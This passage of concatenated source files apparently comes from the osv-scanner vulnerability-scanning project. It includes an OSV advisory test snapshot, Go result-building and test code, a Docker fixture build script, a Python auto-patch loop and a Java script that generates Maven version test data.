(comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] } ], "experimental_config": { "call_analysis": { "enabled": false }, "licenses": { "enabled": false, "allowlist": null } } } ================================================ FILE: 
pkg/osvscanner/testmain_test.go ================================================ package osvscanner_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: pkg/osvscanner/vulnerability_result.go ================================================ package osvscanner import ( "path/filepath" "slices" "sort" "strings" "github.com/google/osv-scalibr/extractor/filesystem/sbom/cdx" cdxmeta "github.com/google/osv-scalibr/extractor/filesystem/sbom/cdx/metadata" "github.com/google/osv-scalibr/inventory/vex" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/grouper" "github.com/google/osv-scanner/v2/internal/imodels" "github.com/google/osv-scanner/v2/internal/imodels/results" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/sourceanalysis" "github.com/google/osv-scanner/v2/internal/spdx" "github.com/google/osv-scanner/v2/pkg/models" "github.com/google/osv-scanner/v2/pkg/osvscanner/internal/imagehelpers" "github.com/ossf/osv-schema/bindings/go/osvconstants" "github.com/ossf/osv-schema/bindings/go/osvschema" ) // buildVulnerabilityResults takes the responses from the OSV API and the deps.dev API // and converts this into a VulnerabilityResults. As part of this, it groups // vulnerability information by source location. 
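// TODO: This function is getting long, we should refactor it
//
// A package ends up in the output when actions.ShowAllPackages is set, when it is
// deprecated, when it has at least one vulnerability that the applicable config
// does not ignore, or when one of its licenses violates actions.ScanLicensesAllowlist.
// Sources are collected in a map and then sorted by path and type, so their order
// does not depend on map iteration order.
//
// Side effect: when license scanning is enabled, license overrides from the config
// are written to the package and the package is stored back into
// scanResults.PackageScanResults.
func buildVulnerabilityResults(
	actions ScannerActions,
	scanResults *results.ScanResults,
) models.VulnerabilityResults {
	vulnResults := models.VulnerabilityResults{
		Results:                     []models.PackageSource{},
		ImageMetadata:               imagehelpers.BuildImageMetadata(scanResults),
		ExperimentalGenericFindings: scanResults.Inventory.GenericFindings,
	}

	type packageVulnsGroup struct {
		pvs         []models.PackageVulns
		annotations []*vex.PackageExploitabilitySignal
	}

	groupedBySource := map[models.SourceInfo]*packageVulnsGroup{}
	for i, p := range scanResults.PackageScanResults {
		includePackage := actions.ShowAllPackages

		var pkg models.PackageVulns
		pkg.Package.Inventory = p

		if commit := imodels.Commit(p); commit != "" {
			pkg.Package.Commit = commit
		}

		pkg.Package.Name = imodels.Name(p)
		pkg.Package.Version = imodels.Version(p)
		pkg.Package.Ecosystem = imodels.Ecosystem(p).String()
		pkg.Package.OSPackageName = imodels.OSPackageName(p)
		pkg.Package.Deprecated = p.Deprecated
		if pkg.Package.Deprecated {
			// Deprecated packages are always reported, even without vulnerabilities.
			includePackage = true
		}

		if p.LayerMetadata != nil {
			pkg.Package.ImageOrigin = &models.ImageOriginDetails{
				Index: p.LayerMetadata.Index,
			}
		}

		pkg.DepGroups = imodels.DepGroups(p)
		configToUse := scanResults.ConfigManager.Get(imodels.Location(p))

		// The ignore rule is evaluated once, on the first vulnerability found for
		// this package. When it applies, every vulnerability of the package is
		// dropped and the package is not included on their account.
		haveCheckedIgnore := false
		for _, vuln := range scanResults.Inventory.PackageVulns {
			if vuln.Package != p {
				continue
			}

			if !haveCheckedIgnore {
				if configToUse.ShouldIgnorePackageVulnerabilities(p) {
					break
				}
				haveCheckedIgnore = true
			}

			includePackage = true
			pkg.Vulnerabilities = append(pkg.Vulnerabilities, vuln.Vulnerability)
		}

		pkg.Groups = grouper.Group(grouper.ConvertVulnerabilityToIDAliases(pkg.Vulnerabilities))
		for groupIdx, group := range pkg.Groups {
			pkg.Groups[groupIdx].MaxSeverity = output.MaxSeverity(group, pkg)
		}

		// For Debian-based ecosystems, mark unimportant vulnerabilities within the package.
		// Debian ecosystems may be listed with a version number, such as "Debian:10".
		if strings.HasPrefix(pkg.Package.Ecosystem, string(osvconstants.EcosystemDebian)) ||
			strings.HasPrefix(pkg.Package.Ecosystem, string(osvconstants.EcosystemUbuntu)) {
			setUnimportant(&pkg)
		}

		if actions.CallAnalysisStates["jar"] {
			setUncalled(&pkg)
		}

		if actions.ScanLicensesSummary || len(actions.ScanLicensesAllowlist) > 0 {
			if override, entry := configToUse.ShouldOverridePackageLicense(p); override {
				if entry.License.Ignore {
					cmdlogger.Infof("ignoring license for package %s/%s/%s", pkg.Package.Ecosystem, pkg.Package.Name, pkg.Package.Version)
					p.Licenses = []string{}
				} else {
					cmdlogger.Infof("overriding license for package %s/%s/%s with %s", pkg.Package.Ecosystem, pkg.Package.Name, pkg.Package.Version, strings.Join(entry.License.Override, ","))
					p.Licenses = entry.License.Override
				}
			}

			// The summary and the allowlist check both report the licenses after
			// any override, so convert them once.
			pkg.Licenses = make([]models.License, len(p.Licenses))
			for j, license := range p.Licenses {
				pkg.Licenses[j] = models.License(license)
			}

			if len(actions.ScanLicensesAllowlist) > 0 {
				for _, license := range pkg.Licenses {
					satisfies, err := spdx.Satisfies(license, actions.ScanLicensesAllowlist)
					if err != nil {
						cmdlogger.Errorf("license %s for package %s/%s/%s is invalid: %s", license, pkg.Package.Ecosystem, pkg.Package.Name, pkg.Package.Version, err)
					}
					// NOTE(review): an invalid license is reported as a violation only if
					// Satisfies returns false together with the error - confirm.
					if !satisfies {
						pkg.LicenseViolations = append(pkg.LicenseViolations, license)
					}
				}

				if len(pkg.LicenseViolations) > 0 {
					includePackage = true
				}
			}

			// Make sure licenses are overridden in the scan results.
			scanResults.PackageScanResults[i] = p
		}

		if includePackage {
			source := models.SourceInfo{
				Path: filepath.ToSlash(imodels.Location(p)),
				Type: imodels.SourceType(p),
			}

			if slices.Contains(p.Plugins, cdx.Name) {
				// Checked assertion: a package that lists the CDX plugin but carries
				// nil or differently typed metadata must not panic the whole scan.
				if meta, ok := p.Metadata.(*cdxmeta.Metadata); ok && meta != nil && len(meta.CDXLocations) > 0 {
					source.Path = source.Path + ":" + meta.CDXLocations[0]
				}
			}

			group := groupedBySource[source]
			if group == nil {
				group = &packageVulnsGroup{}
				groupedBySource[source] = group
			}
			group.pvs = append(group.pvs, pkg)
			// Overwrite annotations as it should be the same for the same package.
			group.annotations = p.ExploitabilitySignals
		}
	}

	// TODO(v2): Move source analysis out of here.
	for source, packages := range groupedBySource {
		sourceanalysis.Run(source, packages.pvs, actions.CallAnalysisStates)
		vulnResults.Results = append(vulnResults.Results, models.PackageSource{
			Source:          source,
			ExperimentalPES: packages.annotations,
			Packages:        packages.pvs,
		})
	}

	// Order by path, then by source type for equal paths.
	sort.Slice(vulnResults.Results, func(i, j int) bool {
		if vulnResults.Results[i].Source.Path == vulnResults.Results[j].Source.Path {
			return vulnResults.Results[i].Source.Type < vulnResults.Results[j].Source.Type
		}

		return vulnResults.Results[i].Source.Path < vulnResults.Results[j].Source.Path
	})

	if len(actions.ScanLicensesAllowlist) > 0 || actions.ScanLicensesSummary {
		vulnResults.ExperimentalAnalysisConfig.Licenses.Summary = actions.ScanLicensesSummary
		allowlist := make([]models.License, len(actions.ScanLicensesAllowlist))
		for i, l := range actions.ScanLicensesAllowlist {
			allowlist[i] = models.License(l)
		}
		vulnResults.ExperimentalAnalysisConfig.Licenses.Allowlist = allowlist
	}

	return vulnResults
}

func setUncalled(pv *models.PackageVulns) {
	// Use index to keep reference to original element in slice
	for groupIdx := range pv.Groups {
		for _, vulnID := range pv.Groups[groupIdx].IDs {
			analysis := &pv.Groups[groupIdx].ExperimentalAnalysis
			if *analysis == nil {
				*analysis = make(map[string]models.AnalysisInfo)
			}
			isUncalled := false
			for _,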
e := range pv.Package.Inventory.ExploitabilitySignals {
				// The signals are read from the package, not from the individual
				// vulnerability: one "vulnerable code not in execute path" signal
				// makes every vulnerability ID of this package uncalled.
				if e.Justification == vex.VulnerableCodeNotInExecutePath {
					isUncalled = true
					break
				}
			}
			// Only Called is recomputed; an Unimportant flag already stored for
			// this ID is carried over.
			(*analysis)[vulnID] = models.AnalysisInfo{
				Called:      !isUncalled,
				Unimportant: (*analysis)[vulnID].Unimportant,
			}
		}
	}
}

// setUnimportant marks vulnerabilities in a PackageVulns as unimportant
// within their respective groups' experimental analysis.
//
// For each vulnerability that isUnimportant accepts, the first group whose IDs
// contain the vulnerability ID gets an AnalysisInfo entry for that ID. The entry
// is replaced as a whole, so an earlier Called value for the same ID is overwritten.
func setUnimportant(pkg *models.PackageVulns) {
	for _, vuln := range pkg.Vulnerabilities {
		if !isUnimportant(vuln) {
			continue
		}
		for i, group := range pkg.Groups {
			if slices.Contains(group.IDs, vuln.GetId()) {
				// Write through pkg.Groups[i]: group is a copy of the slice element.
				if group.ExperimentalAnalysis == nil {
					pkg.Groups[i].ExperimentalAnalysis = make(map[string]models.AnalysisInfo)
				}
				// Flag the vulnerability as unimportant; Called is kept true (see the TODO below).
				pkg.Groups[i].ExperimentalAnalysis[vuln.GetId()] = models.AnalysisInfo{
					Unimportant: true,
					// TODO(gongh@): Currently, call analysis is not supported for Linux distribution vulnerabilities.
					// Called is explicitly set to true so these are not counted as uncalled vulnerabilities.
					// Update this behavior when call analysis for Linux distributions is implemented.
					Called: true,
				}

				// Only the first matching group is updated.
				break
			}
		}
	}
}

// isUnimportant checks if a Debian-based vulnerability is tagged as unimportant.
// Debian: https://security-team.debian.org/security_tracker.html#severity-levels
// Ubuntu: https://ubuntu.com/security/cves/about#priority
func isUnimportant(vuln *osvschema.Vulnerability) bool {
	for _, severity := range vuln.GetSeverity() {
		// TODO(gongh@): remove checking empty severity type after all ubuntu records have a valid severity tag.
if strings.HasPrefix(vuln.GetId(), "UBUNTU-CVE-") && (severity.GetType() == osvschema.Severity_Ubuntu || severity.GetType() == osvschema.Severity_UNSPECIFIED) { return severity.GetScore() == "negligible" } } for _, affected := range vuln.GetAffected() { if es := affected.GetEcosystemSpecific(); es != nil { if fields := es.GetFields(); fields != nil { if urgency, ok := fields["urgency"]; ok && urgency != nil { if urgency.GetStringValue() == "unimportant" { return true } } // TODO (gongh@): Remove this once Ubuntu has fully moved all priority tags into the severity field. if priority, ok := fields["ubuntu_priority"]; ok && priority != nil { if priority.GetStringValue() == "negligible" { return true } } } } } return false } ================================================ FILE: pkg/osvscanner/vulnerability_result_internal_test.go ================================================ package osvscanner import ( "testing" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/packagelockjson" "github.com/google/osv-scalibr/inventory" "github.com/google/osv-scalibr/purl" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/imodels/results" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvschema" ) // makeScanResults returns a unique instance of results.ScanResults for use in tests, // to avoid mutations impacting other test cases func makeScanResults() *results.ScanResults { scanResults := &results.ScanResults{ Inventory: inventory.Inventory{ Packages: []*extractor.Package{ { Name: "pkg-1", PURLType: purl.TypeNPM, Plugins: []string{packagelockjson.Name}, Version: "1.0.0", Location: extractor.LocationFromPath("dir/package-lock.json"), Licenses: []string{"MIT", "0BSD"}, }, { Name: "pkg-2", PURLType: purl.TypeNPM, Plugins: []string{packagelockjson.Name}, Version: "1.0.0", Location: 
// Test_assembleResult snapshots the output of buildVulnerabilityResults for
// several combinations of scanner actions and license configuration. Every
// case starts from its own makeScanResults() instance.
func Test_assembleResult(t *testing.T) {
	t.Parallel()

	type testCase struct {
		name        string
		actions     ScannerActions
		scanResults *results.ScanResults
		cfg         config.Manager
	}

	// A single map instance is handed to every case below.
	// NOTE(review): the subtests run in parallel; if buildVulnerabilityResults
	// ever writes to this map that would be a data race - confirm it is
	// read-only there.
	sharedCallStates := make(map[string]bool)

	cases := []testCase{
		{
			name:        "group_vulnerabilities",
			scanResults: makeScanResults(),
			actions: ScannerActions{
				CallAnalysisStates: sharedCallStates,
			},
		},
		{
			name:        "group_vulnerabilities_with_all_packages_included",
			scanResults: makeScanResults(),
			actions: ScannerActions{
				ShowAllPackages:    true,
				CallAnalysisStates: sharedCallStates,
			},
		},
		{
			name:        "group_vulnerabilities_with_licenses",
			scanResults: makeScanResults(),
			actions: ScannerActions{
				ShowAllPackages:     true,
				ScanLicensesSummary: true,
				CallAnalysisStates:  sharedCallStates,
			},
		},
		{
			name:        "group_vulnerabilities_with_license_allowlist",
			scanResults: makeScanResults(),
			actions: ScannerActions{
				ScanLicensesAllowlist: []string{"MIT", "0BSD"},
				CallAnalysisStates:    sharedCallStates,
			},
		},
		{
			name:        "group_vulnerabilities_with_license_allowlist_and_license_override",
			scanResults: makeScanResults(),
			actions: ScannerActions{
				ScanLicensesAllowlist: []string{"MIT", "0BSD"},
				CallAnalysisStates:    sharedCallStates,
			},
			// pkg-3 is given an explicit license override for this case.
			cfg: config.Manager{
				OverrideConfig: &config.Config{
					PackageOverrides: []config.PackageOverrideEntry{
						{
							Name:      "pkg-3",
							Ecosystem: "npm",
							License: config.License{
								Override: []string{"MIT"},
							},
						},
					},
				},
			},
		},
		{
			name:        "group_vulnerabilities_with_license_allowlist_and_all_packages",
			scanResults: makeScanResults(),
			actions: ScannerActions{
				ShowAllPackages:       true,
				ScanLicensesAllowlist: []string{"MIT", "0BSD"},
				CallAnalysisStates:    sharedCallStates,
			},
		},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			t.Parallel()

			// The config travels inside the scan results, so attach it first.
			tc.scanResults.ConfigManager = tc.cfg

			result := buildVulnerabilityResults(tc.actions, tc.scanResults)
			testutility.NewSnapshot().MatchJSON(t, result)
		})
	}
}
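#!/usr/bin/env bash

# Builds the docker image fixtures used by the image scanning tests.
#
# For every *.Dockerfile in the testdata directory an image is built and saved
# as a tar next to it, unless that tar already exists.
#
# Flags:
#   --force     remove the existing tar for each image first, so it is rebuilt
#   --no-cache  build without the docker layer cache

set -e

testdata_dir="cmd/osv-scanner/scan/image/testdata"

# this is inverted because docker build takes "--no-cache",
# so "false" here means that the layer cache will be used
no_layer_cache=false

# Builds and saves the image named by $1, skipping it if its tar exists.
function build_docker_image_fixture {
  image_name="$1"
  output_tar="$testdata_dir/$image_name.tar"

  if [ ! -f "$output_tar" ]; then
    docker build "$testdata_dir/" -f "$testdata_dir/$image_name.Dockerfile" -t "osv-scanner/$image_name:latest" --no-cache="$no_layer_cache"
    docker image save "osv-scanner/$image_name:latest" -o "$output_tar"
    echo "finished building $output_tar (did not exist)"
  else
    echo "skipped building $output_tar (already exists)"
  fi
}

force=false

while [[ $# -gt 0 ]]; do
  case $1 in
    --force)
      force=true
      shift
      ;;
    --no-cache)
      no_layer_cache=true
      shift
      ;;
    *)
      echo "Unknown argument: $1"
      exit 1
      ;;
  esac
done

for dockerfile in "$testdata_dir"/*.Dockerfile; do
  # without a match the glob stays literal; do not try to build an image named "*"
  [ -e "$dockerfile" ] || continue

  image_name=$(basename "$dockerfile" .Dockerfile)

  if [ "$force" = true ]; then
    echo "Removing existing tar file for $image_name..."
    # -f: a tar that was never built must not abort the run under "set -e"
    rm -f -- "$testdata_dir/$image_name.tar"
  fi

  build_docker_image_fixture "$image_name"
done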
def run_fix(n_patches: int, avoid_pkgs: List[str], strategy: List[str]) -> Tuple[List[str], int, int]:
  """Runs `osv-scanner fix` once against a freshly restored manifest/lockfile.

  Args:
    n_patches: passed as `--apply-top`; 0 means the flag is omitted.
    avoid_pkgs: packages passed as `--upgrade-config <pkg>:none`.
    strategy: extra command line arguments selecting the fix strategy.

  Returns:
    A tuple of (upgraded package names, remaining vulnerability count,
    unfixable vulnerability count), all parsed from the tool's output.
    A count is None when its marker line is not present in the output.
  """
  # start every attempt from the committed package.json & package-lock.json
  subprocess.check_call(['git', 'checkout', 'package.json', 'package-lock.json'], cwd=directory)

  # The command is an argv list, so no shell is involved in running it.
  cmd = ['osv-scanner', 'fix', '-M', manifest, '-L', lockfile, *osv_fix_args, *strategy]
  if n_patches != 0:
    cmd += ['--apply-top', str(n_patches)]
  for pkg in avoid_pkgs:
    cmd += ['--upgrade-config', f'{pkg}:none']

  try:
    output = subprocess.check_output(cmd, text=True)
  except subprocess.CalledProcessError as e:
    # a non-zero exit still has output worth parsing
    output = (e.stdout or '') + (e.stderr or '')

  upgraded = [m.group(1) for m in re.finditer(r'UPGRADED-PACKAGE: (.*),(.*),(.*)', output)]

  remaining_match = re.search(r'REMAINING-VULNS:\s*(\d+)', output)
  unfixable_match = re.search(r'UNFIXABLE-VULNS:\s*(\d+)', output)

  remaining_vulns = int(remaining_match.group(1)) if remaining_match else None
  unfixable_vulns = int(unfixable_match.group(1)) if unfixable_match else None

  return upgraded, remaining_vulns, unfixable_vulns
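# Try each strategy in turn and keep the one that leaves the fewest
# vulnerabilities behind while still passing the tests.
best_strategy = None
best_changes = []
best_avoid = []
best_remaining = 10000000
best_unfixable = None

for strategy in PATCH_STRATEGIES:
  changes, remaining, unfixable, avoid = run_loop(strategy)
  # `remaining` is None when the fix output had no REMAINING-VULNS line;
  # comparing None with an int raises TypeError, so such a run cannot be ranked.
  if changes and remaining is not None and remaining < best_remaining:
    best_strategy = strategy
    best_changes = changes
    best_avoid = avoid
    best_remaining = remaining
    best_unfixable = unfixable

print()
print('===== Auto-patch completed with the following changed packages =====')
print('Best strategy:', best_strategy)
for v in best_changes:
  print(v)
print('The follow packages cannot be upgraded due to failing tests:')
for v in best_avoid:
  print(v)
print()
print(best_remaining, 'vulnerabilities remain')
if best_unfixable:
  print(best_unfixable, 'vulnerabilities are impossible to fix by package upgrades')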
// vulnMatcher builds a cached OSV matcher that identifies itself with this
// tool's user agent and talks to the default OSV host.
func vulnMatcher() clientinterfaces.VulnerabilityMatcher {
	cfg := osvdev.DefaultConfig()
	cfg.UserAgent = userAgent

	osvClient := osvdev.OSVClient{
		HTTPClient:  http.DefaultClient,
		Config:      cfg,
		BaseHostURL: osvdev.DefaultBaseURL,
	}

	matcher := osvmatcher.CachedOSVMatcher{
		Client:              osvClient,
		InitialQueryTimeout: 5 * time.Minute,
	}

	return &matcher
}
// doOverride reads the manifest at filename, resolves it, and computes
// override patches for the result. The patches themselves are discarded; the
// call is made for the requests it causes ddCl to issue along the way.
func doOverride(ddCl *client.DepsDevClient, rw manifest.ReadWriter, filename string) error {
	ctx := context.Background()

	resolver := client.ResolutionClient{
		VulnerabilityMatcher: vulnMatcher(),
		DependencyClient:     ddCl,
	}

	depFile, err := depfile.OpenLocalDepFile(filename)
	if err != nil {
		return err
	}
	defer depFile.Close()

	parsed, err := rw.Read(depFile)
	if err != nil {
		return err
	}

	client.PreFetch(ctx, resolver, parsed.Requirements, parsed.FilePath)

	resolved, err := resolution.Resolve(ctx, resolver, parsed, remediationOpts.ResolveOpts)
	if err != nil {
		return err
	}

	if _, err := remediation.ComputeOverridePatches(ctx, resolver, resolved, remediationOpts); err != nil {
		return err
	}

	return nil
}
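// getCachedVersions returns, per package, the versions that cl holds in its
// requirements cache.
//
// The list is obtained indirectly: cl is asked to write its cache to disk and
// the resulting "<cachePath>.resolve.deps" file is gob-decoded.
//
// The cache is written inside a freshly created private directory rather than
// under a fixed name directly in os.TempDir(). A fixed name in a shared temp
// directory can be pre-created or replaced by another local user, and this
// function both writes to that path and decodes whatever it reads back from it.
// The directory and everything in it is removed on return.
func getCachedVersions(cl *client.DepsDevClient) (map[resolve.PackageKey][]string, error) {
	tmpDir, err := os.MkdirTemp("", "gr-cache-")
	if err != nil {
		return nil, err
	}
	defer os.RemoveAll(tmpDir)

	// Abuse the cache writing to get the list of encountered package versions.
	cachePath := filepath.Join(tmpDir, "gr-cache")
	if err := cl.WriteCache(cachePath); err != nil {
		return nil, err
	}

	b, err := os.ReadFile(cachePath + ".resolve.deps")
	if err != nil {
		return nil, err
	}

	var cache depsdevAPICache
	dec := gob.NewDecoder(bytes.NewReader(b))
	if err := dec.Decode(&cache); err != nil {
		return nil, err
	}

	// Only the keys matter here: group the cached versions by package.
	pkgVers := make(map[resolve.PackageKey][]string)
	for vk := range cache.RequirementsCache {
		pk := resolve.PackageKey{
			Name:   vk.Name,
			System: resolve.System(vk.System),
		}
		pkgVers[pk] = append(pkgVers[pk], vk.Version)
	}

	return pkgVers, nil
}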
:= pks[0].System // Build the schema string. schema := &strings.Builder{} for _, pk := range pks { vers := pkgs[pk] slices.SortFunc(vers, system.Semver().Compare) fmt.Fprintln(schema, pk.Name) for _, v := range vers { fmt.Fprintln(schema, "\t"+v) reqs, err := cl.Requirements(context.Background(), resolve.VersionKey{ PackageKey: pk, Version: v, VersionType: resolve.Concrete, }) if err != nil { continue } for _, r := range reqs { // Don't bother writing Dev or Test dependencies. if r.Type.HasAttr(dep.Dev) || r.Type.HasAttr(dep.Test) { continue } str := r.Name + "@" + r.Version typeStr := typeString(r.Type) if typeStr != "" { str = typeStr + "|" + str } fmt.Fprintf(schema, "\t\t%s\n", str) } } } // Get all vulns for all versions of all packages. // It's easier to re-query this than to try to use the vulnerability client's cache. batchQueries := make([]*api.Query, len(pks)) for i, pk := range pks { batchQueries[i] = &api.Query{ Package: &osvschema.Package{ Name: pk.Name, Ecosystem: string(util.OSVEcosystem[pk.System]), }, } } batchResp, err := osvdev.DefaultClient().QueryBatch(context.Background(), batchQueries) if err != nil { return clienttest.ResolutionUniverse{}, clienttest.VulnerabilityMatcher{}, err } vulnerabilities := make([][]*osvschema.Vulnerability, len(batchResp.GetResults())) g, ctx := errgroup.WithContext(context.Background()) g.SetLimit(1000) for batchIdx, resp := range batchResp.GetResults() { vulnerabilities[batchIdx] = make([]*osvschema.Vulnerability, len(resp.GetVulns())) for resultIdx, vuln := range resp.GetVulns() { g.Go(func() error { // exit early if another hydration request has already failed // results are thrown away later, so avoid needless work if ctx.Err() != nil { return nil //nolint:nilerr // this value doesn't matter to errgroup.Wait() } vuln, err := osvdev.DefaultClient().GetVulnByID(ctx, vuln.GetId()) if err != nil { return err } vulnerabilities[batchIdx][resultIdx] = vuln return nil }) } } if err := g.Wait(); err != nil { return 
// typeString renders a dependency type in the format the universe schema
// expects, which differs from dep.Type.String(): the names of the set flag
// attributes come first, followed by name/value pairs for the value
// attributes, all separated by single spaces.
func typeString(t dep.Type) string {
	var tokens []string

	for _, flag := range flagAttrs {
		if !t.HasAttr(flag) {
			continue
		}
		tokens = append(tokens, flag.String())
	}

	for _, key := range valueAttrs {
		raw, present := t.GetAttr(key)
		if !present {
			continue
		}
		// Must convert the MavenExclusions separator.
		converted := strings.ReplaceAll(raw, "|", ",")
		tokens = append(tokens, key.String(), converted)
	}

	return strings.Join(tokens, " ")
}
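/**
 * Script for generating a list of maven version comparison testdata based off
 * every version mentioned in the OSV Maven database, sorted using the native
 * Maven implementation.
 * <p>
 * To run this, the libraries providing <code>org.apache.maven.artifact.versioning</code>
 * and <code>org.json</code> (the two non-JDK packages this file imports) must be
 * present on the class path.
 * <p>
 * The easiest way to do this is by putting the jars into a <code>lib</code>
 * subfolder and then running:
 * <code>
 * java -cp generators/lib/* generators/GenerateMavenVersions.java
 * </code>
 */
public class GenerateMavenVersions {
  /**
   * An array of version comparisons that are known to be unsupported and so
   * should be commented out in the generated fixture.
   * <p>
   * Generally this is because the native implementation has a suspected bug
   * that causes the comparison to return incorrect results, and so supporting
   * such comparisons in the detector would in fact be wrong.
   */
  private static final String[] UNSUPPORTED_COMPARISONS = {
    "0.0.0-2021-07-06T00-28-13-573087f7 < 0.0.0-2021-07-06T01-14-42-efe42242",
    "0.0.0-2021-12-06T00-08-57-89a33731 < 0.0.0-2021-12-06T01-21-56-e3888760",
    "0.0.0-2022-02-01T00-45-53-0300684a < 0.0.0-2022-02-01T05-45-16-7258ece0",
    "0.0.0-2022-02-28T00-18-39-7fe0d845 < 0.0.0-2022-02-28T04-15-47-83c97ebe",
    "0.0.0-2022-04-29T00-08-11-7086a3ec < 0.0.0-2022-04-29T01-20-09-b424f986",
    "0.0.0-2022-06-14T00-21-33-f21869a7 < 0.0.0-2022-06-14T02-56-29-1db980e0",
    "0.0.0-2022-08-16T00-14-19-aeae3dc3 < 0.0.0-2022-08-16T10-34-26-7a56f709",
    "0.0.0-2022-08-22T00-46-32-4652d3db < 0.0.0-2022-08-22T06-46-40-e7409ac5",
    "0.0.0-2022-10-31T00-42-12-322ba6b9 < 0.0.0-2022-10-31T01-23-06-c6652489",
    "0.0.0-2022-10-31T07-00-43-71eccd49 < 0.0.0-2022-10-31T07-05-43-97874976",
    "0.0.0-2022-12-01T00-02-29-fe8d6705 < 0.0.0-2022-12-01T01-56-22-5b442198",
    "0.0.0-2022-12-18T00-44-34-a222f475 < 0.0.0-2022-12-18T01-45-19-fec81751",
    "0.0.0-2023-03-20T00-52-15-4b4c0e7 < 0.0.0-2023-03-20T01-49-44-80e3135"
  };

  /** Returns true if the given comparison line is listed as unsupported. */
  public static boolean isUnsupportedComparison(String line) {
    return Arrays.asList(UNSUPPORTED_COMPARISONS).contains(line);
  }

  /** Strips one leading "#" or "//" comment marker from the line, if present. */
  public static String uncomment(String line) {
    if(line.startsWith("#")) {
      return line.substring(1);
    }

    if(line.startsWith("//")) {
      return line.substring(2);
    }

    return line;
  }

  /**
   * Downloads the OSV Maven database archive into the working directory.
   * <p>
   * The archive is fetched over HTTPS; no checksum or signature is verified
   * here, so the transport is the only integrity protection the data has.
   *
   * @return the path the archive was written to
   */
  public static String downloadMavenDb() throws IOException {
    URL website = new URL("https://osv-vulnerabilities.storage.googleapis.com/Maven/all.zip");
    String file = "./maven-db.zip";

    // all three resources are closed even if the transfer fails part way
    try(
      InputStream in = website.openStream();
      ReadableByteChannel rbc = Channels.newChannel(in);
      FileOutputStream fos = new FileOutputStream(file)
    ) {
      fos.getChannel().transferFrom(rbc, 0, Long.MAX_VALUE);
    }

    return file;
  }

  /**
   * Downloads the Maven database and collects, per package name, the distinct
   * versions listed for Maven packages, sorted with the native comparator.
   */
  public static Map<String, List<String>> fetchPackageVersions() throws IOException {
    String dbPath = downloadMavenDb();
    List<JSONObject> osvs = loadOSVs(dbPath);

    Map<String, List<String>> packages = new HashMap<>();

    for(JSONObject osv : osvs) {
      // "affected" is not guaranteed to be present on every record
      if(!osv.has("affected")) {
        continue;
      }

      for(Object aff : osv.getJSONArray("affected")) {
        JSONObject affected = (JSONObject) aff;

        // keep Maven packages only; without the negation on the ecosystem
        // check every Maven entry would be skipped instead
        if(!affected.has("package") || !affected.getJSONObject("package").getString("ecosystem").equals("Maven")) {
          continue;
        }

        String pkgName = affected.getJSONObject("package").getString("name");

        if(!affected.has("versions")) {
          continue;
        }

        List<String> known = packages.computeIfAbsent(pkgName, key -> new ArrayList<>());

        for(Object version : affected.getJSONArray("versions")) {
          known.add((String) version);
        }
      }
    }

    // deduplicate and sort the versions for each package
    packages.replaceAll((pkgName, versions) ->
      versions
        .stream()
        .distinct()
        .sorted(Comparator.comparing(ComparableVersion::new))
        .collect(Collectors.toList())
    );

    return packages;
  }

  /**
   * Parses every file entry of the given zip archive as a JSON object.
   * <p>
   * Entries are only read into memory; entry names are never used as paths.
   * Entry sizes are not limited here.
   */
  public static List<JSONObject> loadOSVs(String pathToDbZip) throws IOException {
    List<JSONObject> osvs = new ArrayList<>();

    try(ZipFile zipFile = new ZipFile(pathToDbZip)) {
      Enumeration<? extends ZipEntry> entries = zipFile.entries();

      while(entries.hasMoreElements()) {
        ZipEntry entry = entries.nextElement();

        // a directory entry has no content to parse
        if(entry.isDirectory()) {
          continue;
        }

        StringBuilder responseStrBuilder = new StringBuilder();

        try(BufferedReader streamReader = new BufferedReader(
          new InputStreamReader(zipFile.getInputStream(entry), StandardCharsets.UTF_8)
        )) {
          String inputStr;
          while((inputStr = streamReader.readLine()) != null) {
            responseStrBuilder.append(inputStr);
          }
        }

        osvs.add(new JSONObject(responseStrBuilder.toString()));
      }
    }

    return osvs;
  }

  /** Writes the given lines to outfile as UTF-8, one per line. */
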